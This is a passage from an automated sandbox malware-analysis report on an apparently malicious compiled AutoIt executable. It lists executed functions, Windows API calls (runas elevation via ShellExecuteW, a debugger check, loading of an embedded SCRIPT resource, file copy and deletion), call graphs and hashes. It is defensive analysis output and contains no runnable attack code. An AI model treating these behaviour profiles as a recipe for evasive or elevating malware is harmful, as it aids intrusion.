101166 8303a2 6 API calls 101165->101166 101166->101129 101168 8177c7 59 API calls 101167->101168 101169 8260f7 101168->101169 101170 8177c7 59 API calls 101169->101170 101171 8260ff 101170->101171 101211 825bfd 101171->101211 101174 825bfd 59 API calls 101175 82610f 101174->101175 101176 8177c7 59 API calls 101175->101176 101177 82611a 101176->101177 101178 830ff6 Mailbox 59 API calls 101177->101178 101179 81fa68 101178->101179 101180 826259 101179->101180 101181 826267 101180->101181 101182 8177c7 59 API calls 101181->101182 101183 826272 101182->101183 101184 8177c7 59 API calls 101183->101184 101185 82627d 101184->101185 101186 8177c7 59 API calls 101185->101186 101187 826288 101186->101187 101188 8177c7 59 API calls 101187->101188 101189 826293 101188->101189 101190 825bfd 59 API calls 101189->101190 101191 82629e 101190->101191 101192 830ff6 Mailbox 59 API calls 101191->101192 101193 8262a5 RegisterWindowMessageW 101192->101193 101193->101143 101196 865cc3 101195->101196 101197 82ffee 101195->101197 101214 879d71 60 API calls 101196->101214 101198 830ff6 Mailbox 59 API calls 101197->101198 101200 82fff6 101198->101200 101200->101147 101201 865cce 101202->101154 101203->101156 101215 87748f 65 API calls 101203->101215 101205 8177c7 59 API calls 101204->101205 101206 830227 101205->101206 101207 8177c7 59 API calls 101206->101207 101208 83022f 101207->101208 101209 8177c7 59 API calls 101208->101209 101210 83017b 101209->101210 101210->101160 101212 8177c7 59 API calls 101211->101212 101213 825c05 101212->101213 101213->101174 101214->101201 101216 81e70b 101219 81d260 101216->101219 101218 81e719 101220 81d4dd 101219->101220 101221 81d27d 101219->101221 101232 81d6ab 101220->101232 101268 87a0b5 89 API calls 4 library calls 101220->101268 101222 852abb 101221->101222 101223 852b0a 101221->101223 101227 81d2a4 101221->101227 101226 852abe 101222->101226 101233 852ad9 101222->101233 101263 88a6fb 341 API calls __cinit 101223->101263 101226->101227 101228 852aca 101226->101228 101227->101220 101230 832f80 __cinit 67 API calls 101227->101230 101227->101232 101239 852c26 101227->101239 101243 818620 69 API calls 101227->101243 101244 81d594 101227->101244 101250 81a000 341 API calls 101227->101250 101251 8181a7 59 API calls 101227->101251 101253 8188a0 68 API calls __cinit 101227->101253 101254 8186a2 68 API calls 101227->101254 101256 81859a 68 API calls 101227->101256 101257 81d0dc 341 API calls 101227->101257 101258 819f3a 59 API calls Mailbox 101227->101258 101259 81d060 89 API calls 101227->101259 101260 81cedd 341 API calls 101227->101260 101264 818bb2 68 API calls 101227->101264 101265 819e9c 60 API calls Mailbox 101227->101265 101266 866d03 60 API calls 101227->101266 101261 88ad0f 341 API calls 101228->101261 101230->101227 101232->101218 101233->101220 101262 88b1b7 341 API calls 3 library calls 101233->101262 101234 852cdf 101234->101234 101238 81d5a3 101238->101218 101267 88aa66 89 API calls 101239->101267 101243->101227 101255 818bb2 68 API calls 101244->101255 101250->101227 101251->101227 101253->101227 101254->101227 101255->101238 101256->101227 101257->101227 101258->101227 101259->101227 101260->101227 101261->101232 101262->101220 101263->101227 101264->101227 101265->101227 101266->101227 101267->101220 101268->101234 101269 81568a 101270 815c18 59 API calls 101269->101270 101271 81569c 101270->101271 101272 815632 61 API calls 101271->101272 101273 8156aa 101272->101273 101274 8156ba Mailbox 101273->101274 101276 8181c1 61 API calls Mailbox 101273->101276 101276->101274 101277 81107d 101282 8171eb 101277->101282 101279 81108c 101280 832f80 __cinit 67 API calls 101279->101280 101281 811096 101280->101281 101283 8171fb __write_nolock 101282->101283 101284 8177c7 59 API calls 101283->101284 101285 8172b1 101284->101285 101286 814864 61 API calls 101285->101286 101287 8172ba 101286->101287 101313 83074f 101287->101313 101290 817e0b 59 API calls 101291 8172d3 101290->101291 101292 813f84 59 API calls 101291->101292 101293 8172e2 101292->101293 101294 8177c7 59 API calls 101293->101294 101295 8172eb 101294->101295 101296 817eec 59 API calls 101295->101296 101297 8172f4 RegOpenKeyExW 101296->101297 101298 84ecda RegQueryValueExW 101297->101298 101302 817316 Mailbox 101297->101302 101299 84ecf7 101298->101299 101300 84ed6c RegCloseKey 101298->101300 101301 830ff6 Mailbox 59 API calls 101299->101301 101300->101302 101312 84ed7e _wcscat Mailbox __wsetenvp 101300->101312 101303 84ed10 101301->101303 101302->101279 101305 81538e 59 API calls 101303->101305 101304 817b52 59 API calls 101304->101312 101306 84ed1b RegQueryValueExW 101305->101306 101307 84ed38 101306->101307 101309 84ed52 101306->101309 101308 817d2c 59 API calls 101307->101308 101308->101309 101309->101300 101310 817f41 59 API calls 101310->101312 101311 813f84 59 API calls 101311->101312 101312->101302 101312->101304 101312->101310 101312->101311 101314 841b90 __write_nolock 101313->101314 101315 83075c GetFullPathNameW 101314->101315 101316 83077e 101315->101316 101317 817d2c 59 API calls 101316->101317 101318 8172c5 101317->101318 101318->101290

                                                            Executed Functions

                                                            Function 00813B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00813B7A
                                                            • IsDebuggerPresent.KERNEL32 ref: 00813B8C
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008D62F8,008D62E0,?,?), ref: 00813BFD
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 00820A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00813C26,008D62F8,?,?,?), ref: 00820ACE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00813C81
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008C93F0,00000010), ref: 0084D4BC
                                                            • SetCurrentDirectoryW.KERNEL32(?,008D62F8,?,?,?), ref: 0084D4F4
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008C5D40,008D62F8,?,?,?), ref: 0084D57A
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0084D581
                                                              • Part of subcall function 00813A58: GetSysColorBrush.USER32(0000000F), ref: 00813A62
                                                              • Part of subcall function 00813A58: LoadCursorW.USER32(00000000,00007F00), ref: 00813A71
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(00000063), ref: 00813A88
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(000000A4), ref: 00813A9A
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(000000A2), ref: 00813AAC
                                                              • Part of subcall function 00813A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00813AD2
                                                              • Part of subcall function 00813A58: RegisterClassExW.USER32(?), ref: 00813B28
                                                              • Part of subcall function 008139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00813A15
                                                              • Part of subcall function 008139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00813A36
                                                              • Part of subcall function 008139E7: ShowWindow.USER32(00000000,?,?), ref: 00813A4A
                                                              • Part of subcall function 008139E7: ShowWindow.USER32(00000000,?,?), ref: 00813A53
                                                              • Part of subcall function 008143DB: _memset.LIBCMT ref: 00814401
                                                              • Part of subcall function 008143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008144A6
                                                            Strings
                                                            • This is a third-party compiled AutoIt script., xrefs: 0084D4B4
                                                            • runas, xrefs: 0084D575
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 529118366-3287110873
                                                            • Opcode ID: afb8bd5dc4ed1d53f18a81a63ba3443d7a58be894f8779ab1d268d7b5ffdd954
                                                            • Instruction ID: d546148ae0cfb9cc6b3d338c03509cfb89b0acf651641ddf42f74ea83fdff5ca
                                                            • Opcode Fuzzy Hash: afb8bd5dc4ed1d53f18a81a63ba3443d7a58be894f8779ab1d268d7b5ffdd954
                                                            • Instruction Fuzzy Hash: F051C530D0524CAACF11ABF8DC05EED7B7DFF04704B0442AAF565E22A2EB744695DB62
                                                            Function 00814AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 996 814afe-814b5e call 8177c7 GetVersionExW call 817d2c 1001 814b64 996->1001 1002 814c69-814c6b 996->1002 1003 814b67-814b6c 1001->1003 1004 84db90-84db9c 1002->1004 1006 814c70-814c71 1003->1006 1007 814b72 1003->1007 1005 84db9d-84dba1 1004->1005 1008 84dba4-84dbb0 1005->1008 1009 84dba3 1005->1009 1010 814b73-814baa call 817e8c call 817886 1006->1010 1007->1010 1008->1005 1011 84dbb2-84dbb7 1008->1011 1009->1008 1019 814bb0-814bb1 1010->1019 1020 84dc8d-84dc90 1010->1020 1011->1003 1013 84dbbd-84dbc4 1011->1013 1013->1004 1015 84dbc6 1013->1015 1018 84dbcb-84dbce 1015->1018 1021 814bf1-814c08 GetCurrentProcess IsWow64Process 1018->1021 1022 84dbd4-84dbf2 1018->1022 1019->1018 1023 814bb7-814bc2 1019->1023 1024 84dc92 1020->1024 1025 84dca9-84dcad 1020->1025 1032 814c0a 1021->1032 1033 814c0d-814c1e 1021->1033 1022->1021 1026 84dbf8-84dbfe 1022->1026 1027 84dc13-84dc19 1023->1027 1028 814bc8-814bca 1023->1028 1029 84dc95 1024->1029 1030 84dcaf-84dcb8 1025->1030 1031 84dc98-84dca1 1025->1031 1036 84dc00-84dc03 1026->1036 1037 84dc08-84dc0e 1026->1037 1040 84dc23-84dc29 1027->1040 1041 84dc1b-84dc1e 1027->1041 1038 814bd0-814bd3 1028->1038 1039 84dc2e-84dc3a 1028->1039 1029->1031 1030->1029 1042 84dcba-84dcbd 1030->1042 1031->1025 1032->1033 1034 814c20-814c30 call 814c95 1033->1034 1035 814c89-814c93 GetSystemInfo 1033->1035 1053 814c32-814c3f call 814c95 1034->1053 1054 814c7d-814c87 GetSystemInfo 1034->1054 1043 814c56-814c66 1035->1043 1036->1021 1037->1021 1047 814bd9-814be8 1038->1047 1048 84dc5a-84dc5d 1038->1048 1044 84dc44-84dc4a 1039->1044 1045 84dc3c-84dc3f 1039->1045 1040->1021 1041->1021 1042->1031 1044->1021 1045->1021 1051 84dc4f-84dc55 1047->1051 1052 814bee 1047->1052 1048->1021 1050 84dc63-84dc78 1048->1050 1055 84dc82-84dc88 1050->1055 1056 84dc7a-84dc7d 1050->1056 1051->1021 1052->1021 1061 814c41-814c45 GetNativeSystemInfo 1053->1061 1062 814c76-814c7b 1053->1062 1058 814c47-814c4b 1054->1058 1055->1021 1056->1021 1058->1043 1060 814c4d-814c50 FreeLibrary 1058->1060 1060->1043 1061->1058 1062->1061
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00814B2B
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • GetCurrentProcess.KERNEL32(?,0089FAEC,00000000,00000000,?), ref: 00814BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00814BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00814C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00814C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00814C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00814C8D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 6645bd3f58fe9296657f7050aa7be65837151ae6e0a7f01d043ab88fb1bbb2bf
                                                            • Instruction ID: 44648a43a486cd071ae076f11cd6697a18ff2eb36cbee6bafb8251c8716281f6
                                                            • Opcode Fuzzy Hash: 6645bd3f58fe9296657f7050aa7be65837151ae6e0a7f01d043ab88fb1bbb2bf
                                                            • Instruction Fuzzy Hash: 8691C33154A7C8DEC731DB6894911EABFE8FF26314B58499ED0CAC3B42D234E988C759
                                                            Function 00814FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1063 814fe9-815001 CreateStreamOnHGlobal 1064 815021-815026 1063->1064 1065 815003-81501a FindResourceExW 1063->1065 1066 815020 1065->1066 1067 84dd5c-84dd6b LoadResource 1065->1067 1066->1064 1067->1066 1068 84dd71-84dd7f SizeofResource 1067->1068 1068->1066 1069 84dd85-84dd90 LockResource 1068->1069 1069->1066 1070 84dd96-84ddb4 1069->1070 1070->1066
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00814EEE,?,?,00000000,00000000), ref: 00814FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00814EEE,?,?,00000000,00000000), ref: 00815010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F), ref: 0084DD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F), ref: 0084DD75
                                                            • LockResource.KERNEL32(00814EEE,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F,00000000), ref: 0084DD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 0a35c374056f700372f399fbc73a2c256a374d5e5e62a9fcdd82278561db15d1
                                                            • Instruction ID: 7b62d2cfdfac76aeea01264a2505edd884274ba18b64d61ed99f201b98103dac
                                                            • Opcode Fuzzy Hash: 0a35c374056f700372f399fbc73a2c256a374d5e5e62a9fcdd82278561db15d1
                                                            • Instruction Fuzzy Hash: 46119A74200B00AFD7249BA5DC58F677BBEFFC9B11F244169F50AC6260DB61E8408660
                                                            Function 00874696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0084E7C1), ref: 008746A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008746B7
                                                            • FindClose.KERNEL32(00000000), ref: 008746C7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3a5a12e43bd5058bd59bd26926d19eff532355b3fb8bda09dd6e64fee4338321
                                                            • Instruction ID: edc49ea5b5c5016069e827513f23d1aa27b15e8bf26d5584055dd2aa1365e1f2
                                                            • Opcode Fuzzy Hash: 3a5a12e43bd5058bd59bd26926d19eff532355b3fb8bda09dd6e64fee4338321
                                                            • Instruction Fuzzy Hash: 6EE020314184005B56147778EC4D4EA775CFE16335F144717F93AC11E0E7B0DD5089D5
                                                            Function 0081E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0085428C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: ba796cf95708fc13c6c30f5f92ff80333f91c6e5b8a421bd0c0dc7a4eadb11e4
                                                            • Instruction ID: 3a350835148215d3433817eb222bd5c3c3b0df559eb5627bd99ce28bf3bd71df
                                                            • Opcode Fuzzy Hash: ba796cf95708fc13c6c30f5f92ff80333f91c6e5b8a421bd0c0dc7a4eadb11e4
                                                            • Instruction Fuzzy Hash: 64A27B74A04219CBCB24CF58C480AE9B7BAFF58314F648169ED16EB351D735ED86CB81
                                                            Function 00820B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00820BBB
                                                            • timeGetTime.WINMM ref: 00820E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00820FB3
                                                            • TranslateMessage.USER32(?), ref: 00820FC7
                                                            • DispatchMessageW.USER32(?), ref: 00820FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 00820FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 0082105A
                                                            • DestroyWindow.USER32 ref: 00821066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00821080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 008552AD
                                                            • TranslateMessage.USER32(?), ref: 0085608A
                                                            • DispatchMessageW.USER32(?), ref: 00856098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008560AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4003667617-3242690629
                                                            • Opcode ID: f4da757b65b32683e36f4b9eba40e05be2cd431857c1ee457302d0fc1fd30397
                                                            • Instruction ID: e75bcd8e5b6b8a147c1ff4485c277cf98f54ec5f7b8e1763d6bb3b4fccb4eef2
                                                            • Opcode Fuzzy Hash: f4da757b65b32683e36f4b9eba40e05be2cd431857c1ee457302d0fc1fd30397
                                                            • Instruction Fuzzy Hash: 72B2A070608751DFD728DF24D894BAAB7E5FF84304F14491DE98AD7292DB71E888CB82
                                                            Function 008793DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 008791E9: __time64.LIBCMT ref: 008791F3
                                                              • Part of subcall function 00815045: _fseek.LIBCMT ref: 0081505D
                                                            • __wsplitpath.LIBCMT ref: 008794BE
                                                              • Part of subcall function 0083432E: __wsplitpath_helper.LIBCMT ref: 0083436E
                                                            • _wcscpy.LIBCMT ref: 008794D1
                                                            • _wcscat.LIBCMT ref: 008794E4
                                                            • __wsplitpath.LIBCMT ref: 00879509
                                                            • _wcscat.LIBCMT ref: 0087951F
                                                            • _wcscat.LIBCMT ref: 00879532
                                                              • Part of subcall function 0087922F: _memmove.LIBCMT ref: 00879268
                                                              • Part of subcall function 0087922F: _memmove.LIBCMT ref: 00879277
                                                            • _wcscmp.LIBCMT ref: 00879479
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AAE
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008796DC
                                                            • _wcsncpy.LIBCMT ref: 0087974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00879785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0087979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008797AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008797BE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 430fc9561268bf16a35caf5b8adce39534dae84611b0035af206a525d7947b46
                                                            • Instruction ID: df84fc8a3d5629c5920044bec4c731676ebb3987d1367b9286afc48ffa934f06
                                                            • Opcode Fuzzy Hash: 430fc9561268bf16a35caf5b8adce39534dae84611b0035af206a525d7947b46
                                                            • Instruction Fuzzy Hash: 18C13DB1900229AACF25DF98CC85EDEB7BDFF95314F0040AAF609E7155DB309A848F65
                                                            Function 00813015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                            • RegisterClassExW.USER32(00000030), ref: 0081309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                            • LoadIconW.USER32(000000A9), ref: 008130F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 6ad348dbf4db6232db963b1354cfcd95ed58c5d525db39746be1863af901dfc2
                                                            • Instruction ID: f3f383c7882bbf937dbfdf6112a0c31a2542ee8fa4918a7e5974657ee055ae33
                                                            • Opcode Fuzzy Hash: 6ad348dbf4db6232db963b1354cfcd95ed58c5d525db39746be1863af901dfc2
                                                            • Instruction Fuzzy Hash: 703138B1941349AFDB00DFA4D889AD9BBF4FB09310F18416AE690E62A1E3B60555CF91
                                                            Function 00813041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                            • RegisterClassExW.USER32(00000030), ref: 0081309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                            • LoadIconW.USER32(000000A9), ref: 008130F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
